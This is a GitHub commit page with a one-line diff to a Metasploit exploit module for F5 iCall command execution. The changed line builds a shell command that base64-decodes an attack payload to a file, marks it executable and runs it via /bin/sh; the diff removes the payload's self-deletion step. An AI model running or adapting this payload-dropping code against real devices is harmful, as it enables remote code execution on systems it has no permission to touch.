We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
1 parent 715f20c commit dcfb3b5Copy full SHA for dcfb3b5
modules/exploits/linux/http/f5_icall_cmd.rb
@@ -235,7 +235,7 @@ def exploit
235
# phase 1: create iCall script to create file with payload, execute it and remove it.
236
register_file_for_cleanup @payload_path
237
238
- shell_cmd = %(echo #{Rex::Text.encode_base64(payload.encoded)}|base64 --decode >#{@payload_path}; chmod +x #{@payload_path};#{@payload_path};rm -f #{@payload_path})
+ shell_cmd = %(echo #{Rex::Text.encode_base64(payload.encoded)}|base64 --decode >#{@payload_path}; chmod +x #{@payload_path};#{@payload_path})
239
cmd = %(if { ! [file exists #{@payload_path}]} { exec /bin/sh -c "#{shell_cmd}"})
240
241
arg_max = datastore['ARG_MAX']
0 commit comments